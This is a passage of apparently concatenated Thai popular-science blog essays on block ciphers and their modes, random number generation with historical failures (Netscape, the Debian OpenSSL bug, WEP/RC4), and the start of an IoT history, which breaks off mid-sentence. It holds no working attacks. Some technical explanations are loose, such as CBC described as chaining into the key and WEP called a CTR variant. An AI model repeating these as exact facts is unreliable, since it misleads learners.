เรามักใช้งานเข้ารหัสกับข้อมูลที่ต้องส่งผ่านเครือข่าย เป็นไปได้ที่ข้อมูลอาจจะเสียหายหรือสูญหายระหว่างทาง การใช้ข้อมูลที่ไม่ต้องส่งข้อมูลไปบนเครือข่ายเองบางครั้งก็ต้องการเข้าถึง “ตรงกลาง” ของข้อมูล การเข้าถึงข้อมูลที่เข้ารหัสเป็น stream ขนาดใหญ่ ทำให้กระบวนการถอดรหัสทำได้ช้า เพราะต้องสร้างข้อมูลไบนารีจากจุดเริ่มต้นไปจนถึงจุดจุดที่เราต้องการอ่านข้อมูล จึงจะสามารถถอดรหัสออกมาได้ สำหรับข้อมูลที่ต้องการใช้งานเป็นส่วนๆ ได้ จึงมีการเข้ารหัสแบบ block cipher มาอีกแบบหนึ่งให้เลือกใช้งาน ในตระกูล block cipher นั้นอัลกอริทึมที่ได้รับความนิยมสูงตัวแรกๆ คือ DES หรือ Data Encryption Standard ที่ถูกออกแบบโดย Horst Feisel ที่ทำงานอยู่ในไอบีเอ็มช่วงปี 1977 และได้รับบรรจุเป็นกระบวนการเข้ารหัสมาตรฐานสำหรับรัฐบาลกลางสหรัฐฯ นับแต่นั้นมา ตัวอัลกอริทึม DES นั้นออกแบบให้เข้ารหัสข้อมูลทีละ 64 บิต ด้วยกุญแจขนาด 56 บิต โดยตัวฟังก์ชั่นเองยังไม่สามารถพิสูจน์ได้ว่ามีความปลอดภัยจริงหรือไม่ แต่อายุกว่าสามสิบปีของ DES ก็ยังมีความปลอดภัยตามที่ออกแบบเอาไว้ นั่นคือผู้ที่จะแฮกได้ต้องทดสอบกุญแจถึง 2^56 รูปแบบเพื่อหากุญแจที่ถูกต้องในการถอดรหัส DES นับเป็นตัวอย่างหนึ่งของฟังก์ชั่นความปลอดภัยที่ปลอดภัยจากประสบการณ์ที่ผ่านมา (empirically secure) กุญแจ 2^56 ที่เคยใหญ่พอในยุคของช่วงปี 1970 ซึ่งคอมพิวเตอร์ยังทำงานได้ช้ากว่าทุกวันนี้มาก ทำให้หลายคนยังเชื่อในประสิทธิภาพของฟังก์ชั่น DES เอง แล้วพัฒนามันด้วยการเข้ารหัสซ้ำๆ ไปเป็นจำนวนสามรอบ กลายเป็นฟังก์ชั่น 3DES หรือ Triple DES ที่มีขนาดกุญแจ 168 บิต ทุกวันนี้กระบวนการจ่ายเงินผ่านบัตรเครดิตสมาร์ตการ์ดต่างๆ ยังคงใช้การเข้ารหัสแบบ 3DES เป็นส่วนประกอบสำคัญในการรักษาความปลอดภัย แต่ระหว่างที่ DES ถูกพิสูจน์ว่าไม่ปลอดภัยนั้น สถาบันมาตรฐานและเทคโนโลยีของสหรัฐฯ (National Institute of Standards and Technology - NIST) ก็จัดประกวดมาตรฐานการเข้ารหัส และอัลกอริทึมของ Joan Daemen และ Vincent Rijmen นักคณิตศาสตร์ชาวเบลเยียมก็ชนะการประกวดด้วยอัลกอริทึมที่ปรับปรุงจากอัลกอริทึมเข้ารหัสของตัวเองที่ชื่อว่า Rijndael จนกระทั่งชนะการประกวดและเวอร์ชั่นที่พัฒนาแล้วของ Rijndael ก็กลายเป็นอัลกอริทึม AES ในทุกวันนี้ ในช่วงสิบปีมานี้ มีแนวโน้มที่ระบบการเข้ารหัสใหม่ๆ จะใช้ AES มาเป็นอัลกอริทึมหลักมากขึ้นเรื่อยๆ กระบวนการเข้ารหัส AES ถูกบรรจุเข้าไปในมาตรฐานเช่น SSL, WPA เพื่อรับประกันว่าจะทนทานต่อการเจาะรหัส และเนื่องจากความนิยมที่เพิ่มขึ้นซีพียูรุ่นใหม่ๆ เริ่มมีชุดคำสั่งเร่งการทำงานของ AES เพิ่มเข้ามา ความนิยมของการเข้ารหัสแบบ AES จึงน่าจะได้รับความนิยมสูงขึ้นเรื่อยๆ ในอนาคต ### Block Cipher Operation Mode กระบวนการเข้ารหัสเป็นบล็อคนั้นมีปัญหาเช่นเดียวกับการเข้ารหัสแบบอื่นๆ คือการใช้กุญแจเดิมๆ ซ้ำๆ นั้นจะให้ทำให้ได้ข้อมูลแบบเดิมออกมาเรื่อยๆ แม้ว่าฟังก์ชั่นการเข้ารหัสแบบใหม่ๆ จะทำให้การวิเคราะห์ว่าข้อมูลที่แท้จริงเป็นอะไรนั้นทำได้ยาก แต่หลายครั้งการที่แฮกเกอร์เห็นว่ามีข้อมูลแบบเดิม (ที่ไม่รู้ว่าเป็นอะไร) เดินทางซ้ำๆ บ่อยเพียงใดก็สามารถเปิดเผยข้อมูลบางอย่างได้แล้ว กระบวนการเข้ารหัสเป็นบล็อคที่พื้นฐานที่สุดนั้น เราเรียกว่าโหมด Electronic Code Book (ECB) การทำงานของมันคือการแบ่งข้อมูลออกเป็นบล็อคๆ ตามอัลกอริทึมที่เลือกใช้ เช่น 128 บิตสำหรับ AES หรือ 64 บิตสำหรับ DES แล้วเข้ารหัสด้วยกุญแจที่กำหนด กระบวนการนี้แม้จะมองไม่ออกว่าข้อมูลเป็นอะไร แต่เมื่อมองข้อมูลในภาพรวมแล้วเราก็อาจจะเห็นได้ว่าข้อมูลที่แท้จริงคืออะไร กระบวนการแบบ ECB จึงไม่แนะนำนัก เพื่อให้ข้อมูลทุกบล็อคแตกต่างกันออกไปอย่างแท้จริง มีการเสนอกระบวนการ Cipher Block Chaining (CBC) และ Cipher Feedback (CFB) ขึ้นมา โดยหลักการแล้วทั้งสองแบบคล้ายกันคือใช้ข้อมูลที่เข้ารหัสแล้วของบล็อคก่อนหน้าเพื่อเป็นส่วนประกอบของกุญแจเข้ารหัสของบล็อคถัดไป กระบวนการเช่นนี้ทำให้แม้จะส่งข้อมูลเดิมซ้ำๆ ไปเรื่อยๆ ข้อมูลที่ถอดรหัสแล้วก็จะเปลี่ยนไปไม่รู้จบ ปัญหาของทั้ง CBC และ CFB คือหากมีบล็อคใดบล็อคหนึ่งเสียหายไประหว่างทาง ฝั่งถอดรหัสจะไม่สามารถถอดรหัสบล็อคถัดไปได้อีกด้วย ทำให้ข้อมูลเสียหายไปพร้อมกันสองบล็อค แต่ใช้บล็อคถัดไปที่ได้รับถูกต้องแต่ไม่สามารถถอดรหัสได้เพื่อไปคำนวณกุญแจสำหรับอีกสองบล็อคถัดจากบล็อคที่เสียหายได้ ข้อจำกัดอีกประการคือ CBC และ CFB นั้นไม่สามารถเข้ารหัสแบบขนานได้สะดวก เพราะแต่ละบล็อคต้องรอบล็อกก่อนหน้าเสมอ ทำให้การกระจายงานในซีพียูหลายคอร์ทุกวันนี้ทำได้ยาก เพื่อให้กระบวนการเข้ารหัสสามารถทำไปขนานกันได้ทั้งการเข้ารหัสและการถอดรหัส รวมถึงไม่ต้องเสียข้อมูลมากเกินความจำเป็นในกรณีที่มีข้อมูลเสียหาย โหมดการเข้ารหัสแบบ Counter (CTR) อาศัยการติดตัวเลขที่เปิดเผย หรือเรียกว่า nonce ไปกับข้อมูล ตัวเลขนี้จะเปลี่ยนไปเรื่อยๆ ในแต่ละบล็อค เมื่อนำค่า nonce มารวมกับกุญแจลับเพื่อถอดรหัสแล้ว การส่งข้อมูลเดิมๆ ก็จะเปลี่ยนไปเรื่อยๆ ตาม nonce กระบวนการเข้ารหัสแบบ CTR ถูกดัดแปลงไปใช้งานในมาตรฐานเข้ารหัส WEP ที่ตัวเลขขนาด 24 บิตเรียกว่า initial vector (IV) จะถูกส่งติดไปกับทุกแพ็กเก็ต เพื่อใช้ประกอบกับกุญแจลับในการเข้ารหัส แต่ตัวเลขขนาด 24 บิตนี้นับว่ามีขนาดเล็กมาก และสิ่งที่เกิดขึ้นคือการ์ดแลนไร้สายบางรุ่นพยายามใช้ค่า IV ในแบบสุ่ม แต่การสุ่มที่ดีกลับทำให้ความน่าจะเป็นที่จะใช้ค่า IV นี้ซ้ำกันเกิดขึ้นได้ง่ายในทุกๆ 4096 แพ็กเก็ตเท่านั้น (ปัญหาสุ่มเลขซ้ำนี้เรียกว่า [birthday paradox](https://en.wikipedia.org/wiki/Birthday_paradox) ที่ระบุว่าในกลุ่มคนเพียง 57 คนจะมีวันเกิดวันเดือนเดียวกันด้วยความน่าจะเป็น 0.99) เมื่อเกิดการใช้ค่า IV ซ้ำกัน ค่าไบนารีที่ได้จาก RC4 ก็จะเหมือนกันทุกประการ และแฮกเกอร์ก็จะสามารถคาดเดาได้ว่าข้อมูลภายในเป็นอะไรเมื่อพบข้อมูลที่ใช้ค่า IV เดิมซ้ำกันมากขึ้นเรื่อยๆ แบบเดียวกับการใช้ One Time Pad ซ้ำๆ กัน การเข้ารหัสแบบ ใช้กุญแจร่วมกันทั้งสองฝั่งนั้นยังมีการพัฒนาในรูปแบบอื่นๆ อีกจำนวนมาก การเข้ารหัสเป็นบล็อคยุคใหม่มักใส่กระบวนการพิสูจน์ความถูกต้องของข้อมูลเข้าไว้เป็นมาตรฐานเดียวกับ เช่น CBC-MAC ที่รวมเอาการรวจสอบความถูกต้องเข้ามาร่วมกับการเข้ารหัสเป็นบล็อคในโหมด CBC มาตรฐานใหม่ๆ เช่น Offset Codebook (OCB) ถูกเสนอเป็นทางเลือกของแลนไร้สายแต่กลับไม่ได้รับความนิยมเพราะติดปัญหาสิทธิบัตร การเข้ารหัสแบบกุญแจสมมาตรยังคงเป็นพื้นฐานของการเข้ารหัสแทบทั้งหมดที่เราใช้งานทุกวันนี้ เพราะมีความได้เปรียบที่ความง่ายและประสิทธิภาพที่สูง กระบวนการเข้ารหัสได้รับการปรับปรุงให้ซีพียูรุ่นใหม่ๆ สามารถเข้ารหัส AES ได้นับสิบเมกกะไบต์ต่อวินาที บทความนี้เขียนจบตอนตีสาม และผมนึกวิดีโอมาจบท้ายให้เข้ากับหัวข้อไม่ออก :P
# Random Number Generator: อะไรก็ได้ ง่ายๆ ความสามารถสำคัญของคอมพิวเตอร์คือการทำตามคำสั่งที่ชัดเจนได้อย่างแม่นยำและคาดเดาผลลัพธ์ได้เป็นอย่างดี แต่ในโลกความเป็นจริง กระบวนการอย่างหนึ่งที่สำคัญมากคือการ "มั่ว" ที่ในแม้แต่มนุษย์เราเองก็ยังทำได้ลำบาก เราอาจจะขอให้ใครสักคนมั่วตัวเลขอะไรก็ได้สักสี่หลักให้เรา แต่เราอาจจะพบว่าเมื่อเราขอให้คนจำนวนมากๆ สุ่มเลข เราอาจจะพบว่าเลขที่เราได้มักเป็นเลขที่เราใช้งานบ่อยๆ เช่น "1234", "0000", หรือ "1111" ปัญหาของการสุ่มที่ไม่ดีสร้างปัญหาต่อความปลอดภัยพื้นฐานเป็นอย่างยิ่ง เวลาที่เราเข้ารหัสด้วยกุญแจการเข้ารหัส เรามักคาดหวังว่ากุญแจการเข้ารหัสจะไม่สามารถคาดเดาได้ การเข้ารหัสแบบที่พื้นฐานที่สุดคือ one time pad เป็นการใช้ข้อมูลที่สุ่มอย่างสมบูรณ์ มา XOR กับข้อมูลที่เราต้องการเข้ารหัส หากแฮกเกอร์ไม่สามารถเดาได้ว่าข้อมูลที่สุ่มได้เป็นค่าอะไร ข้อมูลที่เข้ารหัสแล้วจะไม่สามารถถอดรหัสได้ ตัวอย่างปัญหาที่ง่ายที่สุดคือรหัสบัตรเอทีเอ็มที่คนจำนวนมากมักตั้งรหัสผ่านเป็นรหัสที่ง่ายอย่างที่ยกตัวอย่างไปแล้ว ### True Random Number Generator กระบวนการสุ่มอย่างสมบูรณ์เป็นสิ่งที่ปกติแล้วคอมพิวเตอร์พื้นฐานไม่สามารถทำได้ คอมพิวเตอร์ตามสถาปัตยกรรมของ Von Neumann นั้นสามารถทำได้เพียงคำนวณและบันทึกเท่านั้น เพื่อให้คอมพิวเตอร์สามารถ "สุ่ม" ได้ จึงจำเป็นต้องมีแหล่งของความยุ่งเหยิง (entropy source) ในโลกความเป็นจริงนั้น แหล่งของความยุ่งเหยิงอาจจะอยู่ในรูปของลูกเต๋า หรือการสลับไพ่ที่เป็นแหล่งของความยุ่งเหยิงที่ได้รับการยอมรับกันมาเป็นเวลานาน ในโลกของคอมพิวเตอร์นั้นการใช้ความยุ่งเหยิงจากโลกการพนันมาปรับใช้เป็นเรื่องที่มีมานาน สิทธิบัตรของ Richard P. Dunnigan ทำให้คอมพิวเตอร์สามารถสุ่มตัวเลขได้อย่างสมบูรณ์ด้วยการสร้างเครื่อง "ออกหวย" เลือกลูกปิงปองต่อเข้ากับคอมพิวเตอร์ แล้วจึงได้เลขที่ต้องการสุ่มออกมา เครื่องของ Dunnigan สุ่มได้ผลดีพอสมควร แต่ปัญหาคือ มันทำงานได้ช้ามาก หากต้องการข้อมูลสุ่มขนาดใหญ่ในระดับเมกกะไบต์ เราอาจจะต้องใช้เวลานับปีกว่าจะสุ่มข้อมูลได้ขนาดนั้น ในโลกความเป็นจริง เพื่อรักษาความปลอดภัยในระบบคอมพิวเตอร์ เราจำเป็นต้องใช้เลขสุ่มตลอดเวลา ระบบการรักษาความปลอดภัยในการสื่อสารบนอินเทอร์เน็ตอย่าง SSL ต้องการเลขสุ่มเพื่อเป็นกุญแจสำหรับการสื่อสารระหว่างกัน กุญแจนั้นอาจจะมีขนาด 128 บิตขึ้นไป หรือ 16 ไบต์ หากเราใช้เครื่องออกหวยของ Dunnigan เราจะต้องสร้างเครื่องที่มีลูกบอลขนาด 256 ลูก แล้วสุ่มเลือก 16 ครั้งก่อนจะเชื่อมต่อกับเว็บสักเว็บ (นึกภาพพิมพ์คลิก URL แล้วมีเครื่องออกหวยนี้กำลังออกหวย 16 หลัก) ปัญหาความเร็วของการสุ่มกลายเป็นปัญหาสำคัญ ในระบบรักษาความปลอดภัยยุคแรกๆ ไม่มีมาตรฐานการสุ่มเลข ทำให้ซอฟต์แวร์แต่ละตัวพยายามใช้อะไรที่ให้ค่าดู "มั่ว" เพียงพอ เบราว์เซอร์อย่าง Netscape นั้นยุคแรกเคยใช้ค่า MD5 ของเวลาปัจจุบันที่ความละเอียดเป็นวินาทีร่วมกับหมายเลขโปรเซส (PID) แต่เนื่องจากหมายเลขโปรเซสนั้นมักเป็นค่าที่ไม่เกิน 32768 ทำให้แฮกเกอร์ที่ดักฟังการเชื่อมต่ออยู่ และรู้ช่วงเวลาที่เริ่มเชื่อมต่อ สามารถคาดเดากุญแจในการเชื่อมต่อได้ โดยการสร้างคีย์ต่อหมายเลขโปรเซสที่เป็นไปได้ทั้งหมด ร่วมกับ เช่น หากต้องการสร้างกุญแจทั้งหมดในช่วงเวลาก่อนหน้าการเชื่อมต่อไปสิบวินาทีก็ยังต้องสร้างกุญแจเพียงสามแสนกว่าชุดเท่านั้น ในระบบที่พัฒนาต่อๆ อย่าง Kerberos V4 ที่ใช้รักษาความปลอดภัยในองค์กร (ไมโครซอฟท์ซื้อสิทธิของ Kerberos V5 ไปปรับปรุงเป็นระบบรักษาความปลอดภัยของ ActiveDirectory ในภายหลัง) เคยแก้ปัญหาด้วยการใช้ค่าเวลาเป็น "ไมโครวินาที" แม้จะดูคาดเดายากขึ้น แต่ในความเป็นจริงก็ช่วยได้ไม่มากนัก เพราะแฮกเกอร์ที่อยู่ในเครือข่ายเดียวกันอาจจะจับเวลาเริ่มเชื่อมต่อได้อย่างแม่นยำ ปัญหาความ "ไม่มั่ว" ของเลขสุ่มทำให้ระบบปฏิบัติการรุ่นใหม่ๆ ต้องหาแหล่งตั้งต้นเพื่อนำมาสร้างเลขสุ่มกันมากขึ้น และฟังก์ชั่นสุ่มที่ติดมากับภาษาโปรแกรมต่างๆ มักมีคำเตือนว่าห้ามใช้ค่าสุ่มสำหรับการทำงานด้านความปลอดภัย ในลินุกซ์ปัจจุบันนี้แหล่งของความยุ่งเหยิงมาจากสี่แหล่งสำคัญ ได้แก่ การพิมพ์คีย์บอร์ด, การขยับเมาส์, อินเทอร์รัปต์ (เช่นมีแพ็กเก็ตเน็ตเวิร์คเข้ามา), และการอ่านเขียนดิสก์ แล้วนำค่ามารวมกันเป็นค่าขนาด 512 ไบต์ ก่อนจะย่อยให้เลือกค่าสุ่มออกมาทีละ 128 ไบต์ ออกมาในไฟล์เสมือนที่ชื่อว่า `/dev/random` ปัจจุบันแนวทางการสุ่มค่าเช่นนี้ของลินุกซ์ยังถูกวิจารณ์ว่าไม่ปลอดภัยเพียงพอ โดยเฉพาะบนอุปกรณ์ขนาดเล็กที่ไม่มีการใช้งานกับคีย์บอร์ดและเมาส์เช่นเราท์เตอร์ ทำให้ค่าสุ่มที่ออกมาไม่มั่วพอที่จะรักษาความปลอดภัยได้ ปัญหานี้เกิดขึ้นในเราท์เตอร์หลายรุ่นที่สุ่มค่าออกมาอย่างคาดเดาได้ สวิตซ์ขนาดเล็กหลายรุ่นสามารถล็อกอินผ่าน Secure Shell แต่กลับสามารถล็อกอินด้วยคีย์ที่สุ่มมาไม่ดีพอ ทำให้เครื่องจำนวนมากสุ่มคีย์ได้เลขตรงกัน และแฮกเกอร์สามารถวิเคราะห์ได้ว่าเราท์เตอร์รุ่นที่มีปัญหาอาจจะสุ่มค่าได้สูงสุดกี่ค่าและสามารถสร้างคีย์เหล่านั้นเตรียมไว้ล่วงหน้า ในไลบรารี OpenSSL นั้นให้ความสำคัญกับการสุ่มค่าเป็นอย่างมาก เพราะต้องใช้สำหรับการสุ่มกุญแจที่มีความสำคัญสูง เช่น กุญแจใบรับรอง SSL ที่ต้องใช้ต่อเนื่องยาวนานหลายปี หรือกุญแจ Secure Shell ที่เปิดให้คนเข้าถึงเครื่องสำคัญได้ ในระบบ OpenSSL นั้นจะตรวจสอบทุกครั้งที่มีการขอค่าสุ่มว่ามีแหล่งของความยุ่งเหยิงในระบบเพียงพอที่จะสร้างค่าสุ่มที่ดีหรือไม่ แหล่งหนึ่งที่ใช้งานคือหน่วยความจำที่ยังไม่ได้ใส่ค่าเริ่มต้น พฤติกรรมนี้ทำให้ในไลบรารี OpenSSL มีแนวทางการเขียนโปรแกรมแปลกๆ i=fread(buf,1,n,in); if (i <= 0) break; /\* even if n != i, use the full array */ RAND_add(buf,n,i); คือเป็นการใช้บัฟเฟอร์ทั้งหมดแม้จะอ่านค่ามาได้ไม่ครบความยาวบัฟเฟอร์ แนวทางนี้ทำให้ตัวตรวจจับบั๊กอย่าง Valgrind ที่ตรวจบั๊กสำคัญคือการใช้หน่วยความจำที่ยังไม่กำหนดค่า แจ้งเตือนทุกครั้งที่มีการรันโค้ด หลายโครงการมีนโยบายที่จะรัน Valgrind เพื่อตรวจสอบมาตรฐานโค้ด การสื่อสารกับทีมผู้พัฒนา OpenSSL ที่ผิดพลาดทำให้โครงการ Debian เคยคอมเมนต์โค้ดออกจากโค้ดของ OpenSSL เพื่อลดข้อความแจ้งเตือน แต่กลับทำให้แหล่งค่าสุ่มไม่ได้รับการอัพเดต ผลลัพธ์คือกุญแจสำหรับล็อกอิน Secure Shell นั้นมีความเป็นไปได้เพียง 32768 เป็นเวลานานถึงสองปีเต็ม จนทุกวันนี้ยังต้องมีการห้ามใช้กุญแจทั้งหมดด้วยโปรแกรม ssh-keyscan และ ssh-vulnkey เพื่อให้การสุ่มสามารถเชื่อถือได้มากขึ้น และทำงานได้รวดเร็ว ไม่ต้องรออินเทอร์รัปต์หรือการพิมพ์จากผู้ใช้ ผู้ผลิตฮาร์ดแวร์หลายรายออกฮาร์ดแวร์สำหรับสุ่มค่าโดยเฉพาะ (การ์ดแพง แต่ผลลัพธ์มั่วมาก :/ ) โดยอาศัยแหล่งของค่าสุ่มจากฮาร์ดแวร์โดยตรง เช่น สัญญาณรบกวนจากภายนอก หรือความผิดเพี้ยนจากกระแสไฟฟ้า กระบวนการนี้ทำให้สามาารถสร้างค่าสุ่มที่มีคุณภาพดีได้อย่างรวดเร็ว ในซีพียูหลายรุ่นนั้นเริ่มมีการเพิ่มฮาร์ดแวร์ส่วนนี้เข้าไว้ในตัว เช่น อินเทลนั้นเพิ่มฮาร์ดแวร์ส่วนนี้ไว้ตั้งแต่ Ivy Bridge เป็นต้นมา ทำให้มีคำสั่ง RDRAND สามารถสั่งขอค่าสุ่มได้จากซีพียูได้ทันที ในกระบวนการที่ต้องการสุ่มมากๆ เพราะกุญแจต้องใช้งานเป็นเวลานาน เช่น กุญแจสำหรับหน่วยงานรับรองกุญแจอื่นๆ (root CA) นั้น การเปลี่ยนกุญแจเป็นเรื่องยุ่งยากอย่างยิ่ง จึงต้องพยายามอย่างมากที่จะรับประกันว่ากระบวนการได้มาซึ่งค่าสุ่มนั้นสุ่มจริง กระบวนการสร้างค่าสุ่มของหน่วยงานเหล่านี้จึงต้องใช้คนถึงสามคนในการกดเมาส์และคีย์บอร์ดมั่วๆ เป็นระยะเวลาสูงสุดถึง 12 ชั่วโมง เพื่อเป็นต้นกำเนิดของค่าสุ่มที่จะมาเป็นกุญแจของหน่วยงานต่อไป เรียกกระบวนการนี้ว่า key ceremony ### Pseudo Random Number Generator: สุ่มแบบคาดเดาได้ แม้เราจะค้นหาค่าสุ่มอย่างแท้จริงด้วยกระบวนการต่างๆ มาเป็นเวลานาน แต่ในงานหลายอย่างเราต้องการชุดของค่าที่ดูสุ่มแต่สามารถสร้างชุดของค่าสุ่มเช่นเดิมขึ้นมาได้ เราเรียกฟังก์ชั่นเช่นนี้ว่า pseudo random number generator (PRNG) โดยทั่วไปแล้ว PRNG เป็นฟังก์ชั่นที่เก็บสถานะของตัวเองไว้ภายใน เมื่อเริ่มจากสถานะเดิม สามารถให้ค่าที่ "ดูเหมือนค่าสุ่ม" ในลินุกซ์นั้น นอกจากไฟล์ `/dev/random` ที่คืนค่ามาช้าแล้ว ยังมีไฟล์ `/dev/urandom` ที่สามารถคืนค่าได้อย่างรวดเร็ว เพราะอาศัยค่าสุ่มเริ่มต้นจากสภาพแวดล้อมเพียงครั้งเดียว แล้วค่าที่เหลือสามารถสร้างขึ้นมาจากการคำนวณจากสถานะภายใน ระบบสุ่มในภาษาโปรแกรมหลายภาษามักมี PRNG อยู่ภายในเนื่องจากประสิทธิภาพดีกว่า โดยการเรียกฟังก์ชั่นสร้างสถานะภายใน เช่น random_seed จากนั้นการขอค่าสุ่มจะทำงานได้รวดเร็ว ฟังก์ชั่น PRNG ทั่วไปนั้นจำเป็นต้องมีคุณสมบัติคือให้ผลที่กระจายไม่มีรูปแบบใดที่สังเกตได้ ไม่สามารถคาดเดาค่าก่อนหน้าหรือค่าต่อไปได้, ค่าต้องวนกลับมาซ้ำค่าเดิม (สถานะกลับสู่สถานะเดิม) ได้ช้ามาก สำหรับค่าการใช้งานเพื่อการเข้ารหัสนั้นต้องสามารถป้องกันไม่ให้ไม่ให้ใครรู้ค่า seed เริ่มต้นซึ่งมักเป็นกุญแจเข้ารหัสได้ PRNG ที่ได้ยินชื่อกันมากฟังก์ชั่นหนึ่ง คือ RC4 ที่ใช้งานในการเข้ารหัส Wi-Fi แบบ WEP ที่ปัจจุบัน RC4 มีคุณสมบัติทางการเข้ารหัสไม่แข็งแกร่งพอ ทำให้แฮกเกอร์สามารถดักฟังเฟรม Wi-Fi จำนวน 85,000 เฟรมก็สามารถถอดรหัสเอากุญแจออกมาได้ด้วยความน่าจะเป็นถึง 0.95 ถึงตอนนี้เวลามีใครสักคนบอกเราว่า "กินอะไรก็ได้ ง่ายๆ" แล้วเราพบว่าการจะเลือกอะไร "ง่ายๆ" นั้นยาก ก็อาจจะต้องนึกว่าในคอมพิวเตอร์นั้นก็ยากพอกัน
# Internet of Things: ความฝันถึงโลกที่แตกต่างในยุคต่อไป คำว่า Internet of Things (IoT) ได้รับความสนใจอย่างสูงในช่วงเวลาไม่กี่ปีที่ผ่านมา เราเห็นบริการจำนวนมากเริ่มบอกว่าตัวเองรองรับ IoT ในแบบต่างๆ สำหรับคนทั่วไปคำถามคงเป็นเรื่องว่า IoT จะเข้ามาเปลี่ยนชีวิตของเราได้อย่างไร แต่สำหรับนักพัฒนา เราอาจจะตั้งคำถามถึงความเปลี่ยนแปลงที่กำลังจะเกิดขึ้น เทคโนโลยีที่เข้ามาเกี่ยวพันกับ IoT ### ความฝัน ความฝันถึง IoT ถูกกล่าวถึงครั้งแรกๆ ในบทความ "[The Computer for the 21st Century](https://www.ics.uci.edu/~corps/phaseii/Weiser-Computer21stCentury-SciAm.pdf)" ของ Mark Weiser นักวิจัยจาก Xerox PARC ตั้งแต่ปี 1991 ที่ฝันถึงอนาคตที่แต่ละห้องจะมีคอมพิวเตอร์นับร้อยตัว สื่อสารกับผู้คนตลอดเวลาในรูปแบบที่เป็นธรรมชาติ และไม่ได้แยกตัวออกมาว่าเป็น "คอมพิวเตอร์" แบบพีซีที่เป็นอุปกรณ์แปลกแยกจากสิ่งอื่นๆ ในบ้าน แต่คอมพิวเตอร์กลายเป็นส่วนหนึ่งของอุปกรณ์แทบทุกอย่างจนกลายเป็นฉากหลังของการทำงาน โดยเรียกแนวคิดนี้ว่า Ubiquitous Computing (UC) UC ฝันถึงการดำเนินชีวิตที่เปลี่ยนไปเมื่อทุกที่มีคอมพิวเตอร์ เมื่อเราตื่นขึ้นมาเครื่องทำกาแฟจะถามด้วยเสียงว่าเราต้องการกาแฟหรือไม่และเราพูดตอบได้ทันที เมื่อเรากำลังเดินออกจากบ้าน ประตูจะแสดงสภาพอากาศภายนอกพร้อมพยากรณ์อากาศประจำวันรถยนต์สามารถรายงานสภาพจราจรได้ตามเวลาจริง เมื่อมีอุบัติเหตุข้างหน้าเราสามารถเลือกแวะซื้อกาแฟแทนที่จะทนรถติด เมื่อเราใกล้ถึงที่ทำงาน คอมพิวเตอร์ที่ทำงานจะเปิดเครื่องรอการล็อกอินและดาวน์โหลดไฟล์ต่างๆ ที่เราน่าจะใช้งานไว้ให้พร้อม ความฝันของ Weiser นั้นทำนายไว้ว่าจะค่อยๆ เป็นจริงในอีก 20 ปีข้างหน้า (จากบทความที่เขียนไว้ในปี 1991) การมองระยะยาว ความผิดพลาดในการทำนายหลายอย่าง เช่น เขาทำนายในบทความว่าเมื่อคนทั่วไปซื้อฮาร์ดดิสก์ขนาด 1TB มาใช้งานได้ก็แทบไม่ต้องลบไฟล์อีกเลย (คนยุคนั้นคงจินตนาการถึงวิดีโอ 4K และ Steam ไม่ออก) ที่จริงแล้วระยะเวลาผ่านมาถึง 25 ปี คำทำนายของ Weiser เป็นจริงเพียงไม่กี่อย่าง และส่วนมากเป็นจริงนอกกรอบเวลา 20 ปีของเขา เช่นการรายงานสภาพจราจรจาก Waze ที่เพิ่งเป็นส่วนหนึ่งของ Google Maps มาไม่กี่ปีนี้เท่านั้น อย่างไรก็ตาม เทคโนโลยีในตอนนี้บ่งชี้ว่าความฝันของ Weiser กำลังเป็นจริงในที่สุด แนวคิด UC ของ Weiser จะเป็นจริงได้ต้องอาศัยเทคโนโลยีพื้นฐานหลายอย่างที่ยุคนั้นไม่มี หรือมีในราคาแพงอย่างยิ่ง เช่น พลังประมวลผลระดับสูงเพื่อการรับคำสั่งด้วยเสียงและสังเคราะห์เสียงตอบโต้กับผู้ใช้, การเชื่อมต่อตลอดเวลา, สตอเรจขนาดใหญ่สำหรับการเก็บข้อมูลจำนวนมาก, และกระบวนการเข้ารหัสที่ม่ีความปลอดภัยสูง ### พลังประมวลผล พลังประมวลผลเป็นหัวใจสำคัญของคอมพิวเตอร์ ในยุค 1991 นั้น[คอมพิวเตอร์ตั้งโต๊ะคือ PS/2 P75 ที่ใช้ชิป 486](https://www-03.ibm.com/ibm/history/exhibits/pc25/pc25_tenyears.html) [ราคาเปิดตัวอยู่ที่ 19,000 ดอลลาร์](http://www.walshcomptech.com/ps2/8573P75.htm) ความเปลี่ยนแปลงด้านราคาของพลังประมวลผลเป็นสิ่งที่เราเห็นอย่างชัดเจน ทั้งโน้ตบุ๊กที่ตอนนี้ราคาต่ำกว่า 200 ดอลลาร์, โทรศัพท์มือถือที่ราคาต่ำกว่า 50 ดอลลาร์ แต่พลังประมวลผลกลับสูงกว่าคอมพิวเตอร์ในสมัยนั้นอย่างมาก แม้จะเป็นแนวโน้มที่ชัดเจน แต่ในช่วงห้าปีที่ผ่านมามีความเปลี่ยนแปลงสองสามอย่างที่ควรกล่าวถึงว่าเป็นจุดเปลี่ยนของพัฒนาการโลกไปสู่ยุค IoT อย่างแรกคือ Arduino โครงการสร้างแพลตฟอร์มพัฒนาซอฟต์แวร์สำหรับคอมพิวเตอร์ขนาดเล็ก โดย Arduino พยายามทำลายความยุ่งยากของการพัฒนาซอฟต์แวร์สำหรับคอมพิวเตอร์ขนาดเล็กเช่นนี้ในสมัยก่อน ที่ต้องการเครื่องโปรแกรมลงชิปโดยเฉพาะทำให้ยุ่งยากและมีค่าใช้จ่ายสูง Arduino ก้าวข้ามปัญหานี้โดยสร้างบอร์ดที่มีชิป USB-to-Serial มาในตัว และใส่เฟิร์มแวร์ลงในชิป Atmel AVR เพื่อให้เขียนโปรแกรมแล้วโหลดผ่านพอร์ต USB ได้ทันที ประกอบกับการสร้างเฟรมเวิร์คทางฝั่งซอฟต์แวร์ทำให้เขียนโปรแกรมได้ง่าย นอกจากการปรับปรุงให้ทุกอย่างง่ายลงแล้ว Arduino ยังเปิดซอร์สทั้งฮาร์ดแวร์และซอฟต์แวร์ มันกลายเป็นแพลตฟอร์มพื้นฐานสำหรับการสร้างแพลตฟอร์มพัฒนาอื่นๆ ทุกวันนี้มีบอร์ตจำนวนมากที่ใช้โค้ดจาก Arduino ได้ ขณะที่ตัวบอร์ดเองเปิดให้ผู้ผลิตอื่นๆ สามารถนำไปผลิตได้อย่างอิสระ เราสามารถหาบอร์ดราคาถูกได้โดยง่าย ความเปลี่ยนแปลงอีกอย่างคือ Raspberry Pi ที่นำชิปสำหรับโทรศัพท์มือถือมาสร้างเป็นบอร์ดพัฒนา แม้ชิปจะตกรุ่นไปบ้างแต่การเน้นราคาถูกเป็นหลักกลับทำให้ Raspberry Pi 